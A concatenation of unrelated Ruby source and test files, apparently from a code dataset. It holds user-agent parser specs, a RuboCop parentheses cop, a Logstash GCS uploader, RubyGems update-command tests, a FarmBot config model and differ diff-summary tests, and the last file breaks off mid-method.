it "should return '20060612' as its gecko version" do
@useragent.gecko.version.should == "20060612"
end
it "should return 'X11' as its platform" do
@useragent.platform.should == "X11"
end
it "should return 'Linux i686' as its os" do
@useragent.os.should == "Linux i686"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe "UserAgent: 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.14) Gecko/20080409 Camino/1.6 (like Firefox/2.0.0.14)'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.14) Gecko/20080409 Camino/1.6 (like Firefox/2.0.0.14)")
end
it "should return 'Camino' as its browser" do
@useragent.browser.should == "Camino"
end
it "should return '1.6' as its version" do
@useragent.version.should == "1.6"
end
it "should return '20080409' as its gecko version" do
@useragent.gecko.version.should == "20080409"
end
it "should return 'Macintosh' as its platform" do
@useragent.platform.should == "Macintosh"
end
it "should return 'OS X' as its os" do
@useragent.os.should == "OS X"
end
it "should return 'en' as its localization" do
@useragent.localization.should == "en"
end
end
describe 'UserAgent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Iceweasel/2.0 (Debian-2.0+dfsg-1)' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Iceweasel/2.0 (Debian-2.0+dfsg-1)')
end
it "should return 'Iceweasel' as its browser" do
@useragent.browser.should == "Iceweasel"
end
it "should return '2.0' as its version" do
@useragent.version.should == "2.0"
end
it "should return '20061024' as its gecko version" do
@useragent.gecko.version.should == "20061024"
end
it "should return 'X11' as its platform" do
@useragent.platform.should == "X11"
end
it "should return 'Linux i686' as its os" do
@useragent.os.should == "Linux i686"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe 'UserAgent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.4) Gecko/20091017 SeaMonkey/2.0' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.4) Gecko/20091017 SeaMonkey/2.0')
end
it "should return 'Seamonkey' as its browser" do
@useragent.browser.should == "Seamonkey"
end
it "should return '2.0' as its version" do
@useragent.version.should == "2.0"
end
it "should return '20091017' as its gecko version" do
@useragent.gecko.version.should == "20091017"
end
it "should return 'Macintosh' as its platform" do
@useragent.platform.should == "Macintosh"
end
it "should return 'OS X 10.6' as its os" do
@useragent.os.should == "OS X 10.6"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe 'Mozilla/5.0 (Android; Mobile; rv:19.0) Gecko/19.0 Firefox/19.0' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Android; Mobile; rv:19.0) Gecko/19.0 Firefox/19.0')
end
it "should return true for mobile?" do
@useragent.mobile?.should be_true
end
end
describe 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x')
end
it_should_behave_like "Firefox browser"
it "should return 'x.x' as its version" do
@useragent.version.should == "x.x"
end
it "should return '20041107' as its gecko version" do
@useragent.gecko.version.should == "20041107"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows XP' as its os" do
@useragent.os.should == "Windows XP"
end
end
| 28.519751 | 145 | 0.68093 |
bfcce0441c7296a13b6ef9ce2080c53eef0e370b | 8,604 | # frozen_string_literal: true
module RuboCop
module Cop
module Style
# This cop enforces the presence (default) or absence of parentheses in
# method calls containing parameters.
#
# In the default style (require_parentheses), macro methods are ignored.
# Additional methods can be added to the `IgnoredMethods` list. This
# option is valid only in the default style.
#
# In the alternative style (omit_parentheses), there are two additional
# options.
#
# 1. `AllowParenthesesInChaining` is `false` by default. Setting it to
# `true` allows the presence of parentheses in the last call during
# method chaining.
#
# 2. `AllowParenthesesInMultilineCall` is `false` by default. Setting it
# to `true` allows the presence of parentheses in multi-line method
# calls.
#
# @example EnforcedStyle: require_parentheses
#
#
# # bad
# array.delete e
#
# # good
# array.delete(e)
#
# # good
# # Operators don't need parens
# foo == bar
#
# # good
# # Setter methods don't need parens
# foo.bar = baz
#
# # okay with `puts` listed in `IgnoredMethods`
# puts 'test'
#
# # IgnoreMacros: true (default)
#
# # good
# class Foo
# bar :baz
# end
#
# # IgnoreMacros: false
#
# # bad
# class Foo
# bar :baz
# end
#
# @example EnforcedStyle: omit_parentheses
#
# # bad
# array.delete(e)
#
# # good
# array.delete e
#
# # bad
# foo.enforce(strict: true)
#
# # good
# foo.enforce strict: true
#
# # AllowParenthesesInMultilineCall: false (default)
#
# # bad
# foo.enforce(
# strict: true
# )
#
# # good
# foo.enforce \
# strict: true
#
# # AllowParenthesesInMultilineCall: true
#
# # good
# foo.enforce(
# strict: true
# )
#
# # good
# foo.enforce \
# strict: true
#
# # AllowParenthesesInChaining: false (default)
#
# # bad
# foo().bar(1)
#
# # good
# foo().bar 1
#
# # AllowParenthesesInChaining: true
#
# # good
# foo().bar(1)
#
# # good
# foo().bar 1
class MethodCallWithArgsParentheses < Cop
include ConfigurableEnforcedStyle
include IgnoredMethods
TRAILING_WHITESPACE_REGEX = /\s+\Z/.freeze
def on_send(node)
case style
when :require_parentheses
add_offense_for_require_parentheses(node)
when :omit_parentheses
add_offense_for_omit_parentheses(node)
end
end
alias on_super on_send
alias on_yield on_send
def autocorrect(node)
case style
when :require_parentheses
autocorrect_for_require_parentheses(node)
when :omit_parentheses
autocorrect_for_omit_parentheses(node)
end
end
def message(_node = nil)
case style
when :require_parentheses
'Use parentheses for method calls with arguments.'.freeze
when :omit_parentheses
'Omit parentheses for method calls with arguments.'.freeze
end
end
private
def add_offense_for_require_parentheses(node)
return if ignored_method?(node.method_name)
return if eligible_for_parentheses_omission?(node)
return unless node.arguments? && !node.parenthesized?
add_offense(node)
end
def add_offense_for_omit_parentheses(node)
return unless node.parenthesized?
return if node.implicit_call?
return if super_call_without_arguments?(node)
return if camel_case_method_call_without_arguments?(node)
return if eligible_for_parentheses_presence?(node)
add_offense(node, location: node.loc.begin.join(node.loc.end))
end
def autocorrect_for_require_parentheses(node)
lambda do |corrector|
corrector.replace(args_begin(node), '(')
unless args_parenthesized?(node)
corrector.insert_after(args_end(node), ')')
end
end
end
def autocorrect_for_omit_parentheses(node)
lambda do |corrector|
if parentheses_at_the_end_of_multiline_call?(node)
corrector.replace(args_begin(node), ' \\')
else
corrector.replace(args_begin(node), ' ')
end
corrector.remove(node.loc.end)
end
end
def eligible_for_parentheses_omission?(node)
node.operator_method? || node.setter_method? || ignore_macros?(node)
end
def ignore_macros?(node)
cop_config['IgnoreMacros'] && node.macro?
end
def args_begin(node)
loc = node.loc
selector =
node.super_type? || node.yield_type? ? loc.keyword : loc.selector
resize_by = args_parenthesized?(node) ? 2 : 1
selector.end.resize(resize_by)
end
def args_end(node)
node.loc.expression.end
end
def args_parenthesized?(node)
return false unless node.arguments.one?
first_node = node.arguments.first
first_node.begin_type? && first_node.parenthesized_call?
end
def parentheses_at_the_end_of_multiline_call?(node)
node.multiline? &&
node.loc.begin.source_line
.gsub(TRAILING_WHITESPACE_REGEX, '')
.end_with?('(')
end
def super_call_without_arguments?(node)
node.super_type? && node.arguments.none?
end
def camel_case_method_call_without_arguments?(node)
node.camel_case_method? && node.arguments.none?
end
def eligible_for_parentheses_presence?(node)
call_in_literals?(node) ||
call_with_ambiguous_arguments?(node) ||
call_in_logical_operators?(node) ||
allowed_multiline_call_with_parentheses?(node) ||
allowed_chained_call_with_parentheses?(node)
end
def call_in_literals?(node)
node.parent &&
(node.parent.pair_type? ||
node.parent.array_type? ||
ternary_if?(node.parent))
end
def call_in_logical_operators?(node)
node.parent &&
(logical_operator?(node.parent) ||
node.parent.descendants.any?(&method(:logical_operator?)))
end
def call_with_ambiguous_arguments?(node)
call_with_braced_block?(node) ||
call_as_argument?(node) ||
hash_literal_in_arguments?(node) ||
node.descendants.any? do |n|
splat?(n) || ternary_if?(n) || logical_operator?(n)
end
end
def call_with_braced_block?(node)
node.block_node && node.block_node.braces?
end
def call_as_argument?(node)
node.parent && node.parent.send_type?
end
def hash_literal_in_arguments?(node)
node.arguments.any? do |n|
hash_literal?(n) ||
n.send_type? && node.descendants.any?(&method(:hash_literal?))
end
end
def allowed_multiline_call_with_parentheses?(node)
cop_config['AllowParenthesesInMultilineCall'] && node.multiline?
end
def allowed_chained_call_with_parentheses?(node)
return unless cop_config['AllowParenthesesInChaining']
previous = node.descendants.first
return false unless previous && previous.send_type?
previous.parenthesized? ||
allowed_chained_call_with_parentheses?(previous)
end
def splat?(node)
node.splat_type? || node.kwsplat_type? || node.block_pass_type?
end
def ternary_if?(node)
node.if_type? && node.ternary?
end
def logical_operator?(node)
(node.and_type? || node.or_type?) && node.logical_operator?
end
def hash_literal?(node)
node.hash_type? && node.braces?
end
end
end
end
end
| 28.117647 | 78 | 0.565783 |
4aadc4bab6175b2fb8c7bedcd8cc7245f66a9176 | 531 | # a simple (manual) unsaved? flag and method. at least it automatically reverts after a save!
module ActiveScaffold::UnsavedRecord
# acts like a dirty? flag, manually thrown during update_record_from_params.
def unsaved=(val)
@unsaved = (val) ? true : false
end
# whether the unsaved? flag has been thrown
def unsaved?
@unsaved
end
# automatically unsets the unsaved flag
def save(*)
super.tap { self.unsaved = false }
end
end
ActiveRecord::Base.class_eval { include ActiveScaffold::UnsavedRecord }
| 27.947368 | 93 | 0.728814 |
03ae1b8a3d0c072554ef46dc75d0236a3dafe00b | 3,503 | # encoding: utf-8
require "logstash/util"
require 'thread'
require 'java'
require 'logstash-output-google_cloud_storage_jars.rb'
java_import 'com.google.api.gax.rpc.FixedHeaderProvider'
java_import 'com.google.api.gax.retrying.RetrySettings'
java_import 'com.google.auth.oauth2.GoogleCredentials'
java_import 'com.google.cloud.storage.BlobInfo'
java_import 'com.google.cloud.storage.StorageOptions'
java_import 'java.io.FileInputStream'
java_import 'org.threeten.bp.Duration'
module LogStash
module Outputs
class GCS
class Uploader
DEFAULT_THREADPOOL = Concurrent::ThreadPoolExecutor.new({
:min_threads => 1,
:max_threads => 8,
:max_queue => 1,
:fallback_policy => :caller_runs
})
attr_reader :bucket, :upload_options, :logger
def initialize(bucket, logger, threadpool = DEFAULT_THREADPOOL, retry_count: Float::INFINITY, retry_delay: 1)
@bucket = bucket
@workers_pool = threadpool
@logger = logger
@retry_count = retry_count
@retry_delay = retry_delay
end
def upload_async(file, options = {})
@workers_pool.post do
LogStash::Util.set_thread_name("GCS output uploader, file: #{file.path}")
upload(file, options)
end
end
def upload(file, options = {})
upload_options = options.fetch(:upload_options, {})
tries = 0
begin
obj = bucket.object(file.key)
obj.upload_file(file.path, upload_options)
rescue Errno::ENOENT => e
logger.error("File doesn't exist! Unrecoverable error.", :exception => e.class, :message => e.message, :path => file.path, :backtrace => e.backtrace)
rescue => e
# When we get here it usually mean that S3 tried to do some retry by himself (default is 3)
# When the retry limit is reached or another error happen we will wait and retry.
#
# Thread might be stuck here, but I think its better than losing anything
# its either a transient errors or something bad really happened.
if tries < @retry_count
tries += 1
logger.warn("Uploading failed, retrying (##{tries} of #{@retry_count})", :exception => e.class, :message => e.message, :path => file.path, :backtrace => e.backtrace)
sleep @retry_delay
retry
else
logger.error("Failed to upload file (retried #{@retry_count} times).", :exception => e.class, :message => e.message, :path => file.path, :backtrace => e.backtrace)
end
end
begin
options[:on_complete].call(file) unless options[:on_complete].nil?
rescue => e
logger.error("An error occurred in the `on_complete` uploader", :exception => e.class, :message => e.message, :path => file.path, :backtrace => e.backtrace)
raise e # reraise it since we don't deal with it now
end
end
def stop
@workers_pool.shutdown
@workers_pool.wait_for_termination(nil) # block until its done
end
end
end
end
end
| 39.806818 | 179 | 0.568655 |
6a327068e25e8711457d053b44316b3f04de2adc | 11,922 | require 'rubygems/test_case'
require 'rubygems/commands/update_command'
begin
gem "rdoc"
rescue Gem::LoadError
# ignore
end
class TestGemCommandsUpdateCommand < Gem::TestCase
def setup
super
common_installer_setup
@cmd = Gem::Commands::UpdateCommand.new
@cmd.options[:document] = []
@specs = spec_fetcher do |fetcher|
fetcher.gem 'a', 1
fetcher.gem 'a', 2
fetcher.gem 'a', '3.a'
fetcher.clear
end
@a1_path = @specs['a-1'].cache_file
@a2_path = @specs['a-1'].cache_file
@a3a_path = @specs['a-3.a'].cache_file
end
def test_execute
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
fetcher.clear
fetcher.spec 'a', 1
end
@cmd.options[:args] = []
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Updating a", out.shift
assert_equal "Gems updated: a", out.shift
assert_empty out
end
def test_execute_multiple
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
fetcher.gem 'ab', 2
fetcher.clear
fetcher.spec 'a', 1
fetcher.spec 'ab', 1
end
@cmd.options[:args] = %w[a]
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Updating a", out.shift
assert_equal "Gems updated: a", out.shift
assert_empty out
end
def test_execute_system
spec_fetcher do |fetcher|
fetcher.gem 'rubygems-update', 9 do |s| s.files = %w[setup.rb] end
fetcher.clear
end
@cmd.options[:args] = []
@cmd.options[:system] = true
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating rubygems-update", out.shift
assert_equal "Installing RubyGems 9", out.shift
assert_equal "RubyGems system software updated", out.shift
assert_empty out
end
def test_execute_system_at_latest
spec_fetcher do |fetcher|
fetcher.gem 'rubygems-update', Gem::VERSION do |s|
s.files = %w[setup.rb]
end
fetcher.clear
end
@cmd.options[:args] = []
@cmd.options[:system] = true
assert_raises Gem::MockGemUi::SystemExitException do
use_ui @ui do
@cmd.execute
end
end
out = @ui.output.split "\n"
assert_equal "Latest version currently installed. Aborting.", out.shift
assert_empty out
end
def test_execute_system_multiple
spec_fetcher do |fetcher|
fetcher.gem 'rubygems-update', 8 do |s| s.files = %w[setup.rb] end
fetcher.gem 'rubygems-update', 9 do |s| s.files = %w[setup.rb] end
fetcher.clear
end
@cmd.options[:args] = []
@cmd.options[:system] = true
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating rubygems-update", out.shift
assert_equal "Installing RubyGems 9", out.shift
assert_equal "RubyGems system software updated", out.shift
assert_empty out
end
def test_execute_system_specific
spec_fetcher do |fetcher|
fetcher.gem 'rubygems-update', 8 do |s| s.files = %w[setup.rb] end
fetcher.gem 'rubygems-update', 9 do |s| s.files = %w[setup.rb] end
fetcher.clear
end
@cmd.options[:args] = []
@cmd.options[:system] = "8"
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating rubygems-update", out.shift
assert_equal "Installing RubyGems 8", out.shift
assert_equal "RubyGems system software updated", out.shift
assert_empty out
end
def test_execute_system_specifically_to_latest_version
spec_fetcher do |fetcher|
fetcher.gem 'rubygems-update', 8 do |s| s.files = %w[setup.rb] end
fetcher.gem 'rubygems-update', 9 do |s| s.files = %w[setup.rb] end
fetcher.clear
end
@cmd.options[:args] = []
@cmd.options[:system] = "9"
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating rubygems-update", out.shift
assert_equal "Installing RubyGems 9", out.shift
assert_equal "RubyGems system software updated", out.shift
assert_empty out
end
def test_execute_system_with_gems
@cmd.options[:args] = %w[gem]
@cmd.options[:system] = true
assert_raises Gem::MockGemUi::TermError do
use_ui @ui do
@cmd.execute
end
end
assert_empty @ui.output
assert_equal "ERROR: Gem names are not allowed with the --system option\n",
@ui.error
end
# before:
# a1 -> c1.2
# after:
# a2 -> b2 # new dependency
# a2 -> c2
def test_execute_dependencies
spec_fetcher do |fetcher|
fetcher.gem 'a', 2, 'b' => 2, 'c' => 2
fetcher.gem 'b', 2
fetcher.gem 'c', 2
fetcher.clear
fetcher.spec 'a', 1, 'c' => '1.2'
fetcher.spec 'c', '1.2'
end
Gem::Specification.reset
@cmd.options[:args] = []
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Updating a", out.shift
assert_equal "Gems updated: a b c",
out.shift
assert_empty out
end
def test_execute_rdoc
skip if RUBY_VERSION <= "1.8.7"
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
fetcher.clear
fetcher.spec 'a', 1
end
Gem.done_installing(&Gem::RDoc.method(:generation_hook))
@cmd.options[:document] = %w[rdoc ri]
@cmd.options[:args] = %w[a]
use_ui @ui do
@cmd.execute
end
wait_for_child_process_to_exit
a2 = @specs['a-2']
assert_path_exists File.join(a2.doc_dir, 'rdoc')
end
def test_execute_named
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
fetcher.clear
fetcher.spec 'a', 1
end
@cmd.options[:args] = %w[a]
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Updating a", out.shift
assert_equal "Gems updated: a", out.shift
assert_empty out
end
def test_execute_named_some_up_to_date
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
fetcher.clear
fetcher.spec 'a', 1
fetcher.spec 'b', 2
end
@cmd.options[:args] = %w[a b]
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Updating a", out.shift
assert_equal "Gems updated: a", out.shift
assert_equal "Gems already up-to-date: b", out.shift
assert_empty out
end
def test_execute_named_up_to_date
spec_fetcher do |fetcher|
fetcher.spec 'a', 2
end
@cmd.options[:args] = %w[a]
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Nothing to update", out.shift
assert_empty out
end
def test_execute_named_up_to_date_prerelease
spec_fetcher do |fetcher|
fetcher.gem 'a', '3.a'
fetcher.clear
fetcher.gem 'a', 2
end
@cmd.options[:args] = %w[a]
@cmd.options[:prerelease] = true
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Updating a", out.shift
assert_equal "Gems updated: a", out.shift
assert_empty out
end
def test_execute_up_to_date
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
end
@cmd.options[:args] = []
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Nothing to update", out.shift
assert_empty out
end
def test_execute_user_install
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
fetcher.clear
fetcher.spec 'a', 1
end
@cmd.handle_options %w[--user-install]
use_ui @ui do
@cmd.execute
end
installer = @cmd.installer
user_install = installer.instance_variable_get :@user_install
assert user_install, 'user_install must be set on the installer'
end
def test_fetch_remote_gems
specs = spec_fetcher do |fetcher|
fetcher.gem 'a', 1
fetcher.gem 'a', 2
end
expected = [
[Gem::NameTuple.new('a', v(2), Gem::Platform::RUBY),
Gem::Source.new(@gem_repo)],
]
assert_equal expected, @cmd.fetch_remote_gems(specs['a-1'])
end
def test_fetch_remote_gems_error
Gem.sources.replace %w[http://nonexistent.example]
assert_raises Gem::RemoteFetcher::FetchError do
@cmd.fetch_remote_gems @specs['a-1']
end
end
def test_fetch_remote_gems_mismatch
platform = Gem::Platform.new 'x86-freebsd9'
specs = spec_fetcher do |fetcher|
fetcher.spec 'a', 1
fetcher.spec 'a', 2
fetcher.spec 'a', 2 do |s| s.platform = platform end
end
expected = [
[Gem::NameTuple.new('a', v(2), Gem::Platform::RUBY),
Gem::Source.new(@gem_repo)],
]
assert_equal expected, @cmd.fetch_remote_gems(specs['a-1'])
end
def test_fetch_remote_gems_prerelease
specs = spec_fetcher do |fetcher|
fetcher.gem 'a', 1
fetcher.gem 'a', 2
fetcher.gem 'a', '3.a'
end
@cmd.options[:prerelease] = true
expected = [
[Gem::NameTuple.new('a', v(2), Gem::Platform::RUBY),
Gem::Source.new(@gem_repo)],
[Gem::NameTuple.new('a', v('3.a'), Gem::Platform::RUBY),
Gem::Source.new(@gem_repo)],
]
assert_equal expected, @cmd.fetch_remote_gems(specs['a-1'])
end
def test_handle_options_system
@cmd.handle_options %w[--system]
expected = {
:args => [],
:document => %w[rdoc ri],
:force => false,
:system => true,
}
assert_equal expected, @cmd.options
end
def test_handle_options_system_non_version
assert_raises ArgumentError do
@cmd.handle_options %w[--system non-version]
end
end
def test_handle_options_system_specific
@cmd.handle_options %w[--system 1.3.7]
expected = {
:args => [],
:document => %w[rdoc ri],
:force => false,
:system => "1.3.7",
}
assert_equal expected, @cmd.options
end
def test_update_gem_prerelease
spec_fetcher do |fetcher|
fetcher.spec 'a', '1.a'
fetcher.gem 'a', '1.b'
end
@cmd.update_gem 'a', Gem::Requirement.new('= 1.b')
refute_empty @cmd.updated
assert @cmd.installer.instance_variable_get :@prerelease
end
def test_update_gem_unresolved_dependency
spec_fetcher do |fetcher|
fetcher.spec 'a', 1
fetcher.gem 'a', 2 do |s|
s.add_dependency 'b', '>= 2'
end
fetcher.spec 'b', 1
end
@cmd.update_gem 'a'
assert_empty @cmd.updated
end
def test_update_rubygems_arguments
@cmd.options[:system] = true
arguments = @cmd.update_rubygems_arguments
assert_equal '--prefix', arguments.shift
assert_equal Gem.prefix, arguments.shift
assert_equal '--no-rdoc', arguments.shift
assert_equal '--no-ri', arguments.shift
assert_equal '--previous-version', arguments.shift
assert_equal Gem::VERSION, arguments.shift
assert_empty arguments
end
def test_update_rubygems_arguments_1_8_x
@cmd.options[:system] = '1.8.26'
arguments = @cmd.update_rubygems_arguments
assert_equal '--prefix', arguments.shift
assert_equal Gem.prefix, arguments.shift
assert_equal '--no-rdoc', arguments.shift
assert_equal '--no-ri', arguments.shift
assert_empty arguments
end
end
| 21.915441 | 80 | 0.620282 |
390ce96fa2dfe84ddda94dba5da7245ec8fc244f | 983 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module ArrowDataset
VERSION = "5.0.0-SNAPSHOT"
module Version
numbers, TAG = VERSION.split("-")
MAJOR, MINOR, MICRO = numbers.split(".").collect(&:to_i)
STRING = VERSION
end
end
| 36.407407 | 62 | 0.747711 |
bb49383a704ae16a81d0be8faa78e0251f62073a | 956 | module Metamachine
# Handler of events
# Builds transition and contract
# Runs transition runner in the context of contract
class Dispatch
include DefInitialize.with('machine, event_name, target, params')
def call
build_transition.tap do |transition|
transition.contract!(transition.target) do
machine.run_transition(transition)
end
end
end
private
def build_transition
Transition.new(
event_name: event_name,
target: target,
params: params,
contract: build_contract
)
end
def build_contract
state_from = target.send(machine.state_reader)
state_to = machine.calculate_state_to(state_from, event_name)
raise InvalidTransitionInitialState if state_to.nil?
StateContract.new(
state_from: state_from,
state_to: state_to,
state_reader: machine.state_reader
)
end
end
end
| 23.317073 | 69 | 0.666318 |
181c79fd0a6a8b34578155af360d9785bc73b938 | 236 | require "music-theory/note/name"
require "music-theory/note/value"
module MusicTheory
module Note
class << self
def new(*args)
Note::Name.find(*args)
end
alias_method :find, :new
end
end
end
| 11.8 | 33 | 0.618644 |
4a453d12a9844d683ac8279727b637643c3f2bc9 | 1,093 | # An API backup of user options for Farmbot OS.
class FbosConfig < ApplicationRecord
class MissingSerial < StandardError; end
belongs_to :device
after_save :maybe_sync_nerves, on: [:create, :update]
FIRMWARE_HARDWARE = [
ARDUINO = "arduino",
FARMDUINO = "farmduino",
FARMDUINO_K14 = "farmduino_k14",
EXPRESS_K10 = "express_k10",
]
NERVES_FIELD = "update_channel"
def push_changes_to_nerves_hub(serial_number, channel)
NervesHub.update_channel(serial_number, channel)
end
def sync_nerves
serial = device.serial_number
unless serial
# This feature can be removed in May '19
# It is used to repair data damage on
# production during the initial nerveshub
# deployment.
problem = "Device #{device.id} missing serial"
NervesHub.report_problem({ problem: problem })
return
end
self.delay.push_changes_to_nerves_hub(serial, update_channel)
end
def nerves_info_changed?
the_changes.keys.include?(NERVES_FIELD)
end
def maybe_sync_nerves
sync_nerves if nerves_info_changed?
end
end
| 25.418605 | 65 | 0.719122 |
e268f920ed38fac79c9a624f77b2273ce6e11557 | 4,997 | require_relative 'differ_test_base'
class DiffSummaryTest < DifferTestBase
def self.id58_prefix
'4DE'
end
# - - - - - - - - - - - - - - - - - - - - - - - -
test 'j12',
'created empty file' do
assert_diff_summary('RNCzUr', 2, 3,
:created, nil, 'empty.file', 0,0,0,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'readme.txt' , 'readme.txt' , 0,0,14
)
end
# - - - - - - - - - - - - - -
test 'j13',
'deleted empty file' do
assert_diff_summary('RNCzUr', 3, 4,
:deleted, 'empty.file', nil, 0,0,0,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'readme.txt' , 'readme.txt' , 0,0,14
)
end
# - - - - - - - - - - - - - -
test 'j14',
'renamed empty file' do
assert_diff_summary('RNCzUr', 5, 6,
:renamed, 'empty.file', 'empty.file.rename', 0,0,0,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'readme.txt' , 'readme.txt' , 0,0,14
)
end
# - - - - - - - - - - - - - -
test 'j15',
'empty file renamed 100% identical across dirs' do
assert_diff_summary('RNCzUr', 6, 7,
:renamed, "empty.file.rename", "sub_dir/empty.file.rename", 0,0,0,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'readme.txt' , 'readme.txt' , 0,0,14
)
end
# - - - - - - - - - - - - - -
test 'j16',
'empty file has one lines added' do
assert_diff_summary('RNCzUr', 7, 8,
:changed, "sub_dir/empty.file.rename", "sub_dir/empty.file.rename", 1,0,0,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'readme.txt' , 'readme.txt' , 0,0,14
)
end
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
test 'k15',
'non-empty file deleted' do
assert_diff_summary('RNCzUr', 8, 9,
:deleted, "readme.txt", nil, 0,14,0,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'sub_dir/empty.file.rename', 'sub_dir/empty.file.rename', 0,0,1
)
end
# - - - - - - - - - - - - - -
test 'k16',
'non-empty file renamed 100% identical' do
assert_diff_summary('RNCzUr', 9, 10,
:renamed, "bats_help.txt", "bats_help.txt.rename", 0,0,3,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'sub_dir/empty.file.rename', 'sub_dir/empty.file.rename', 0,0,1
)
end
# - - - - - - - - - - - - - -
test 'k17',
'non-empty file renamed <100% identical' do
assert_diff_summary('RNCzUr', 13, 14,
:changed, "bats_help.txt", "bats_help.txt", 1,1,19, # data error. No rename here.
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'sub_dir/empty.file.rename', 'sub_dir/empty.file.rename', 0,0,1
)
end
# - - - - - - - - - - - - - -
test 'k18',
'two non-empty files both edited' do
assert_diff_summary('RNCzUr', 1, 2,
:changed, "hiker.sh", "hiker.sh", 1,1,5,
:changed, "readme.txt", "readme.txt", 6,3,8,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
)
end
private
def assert_diff_summary(id, was_index, now_index, *diffs)
expected = diffs.each_slice(6).to_a.map do |diff|
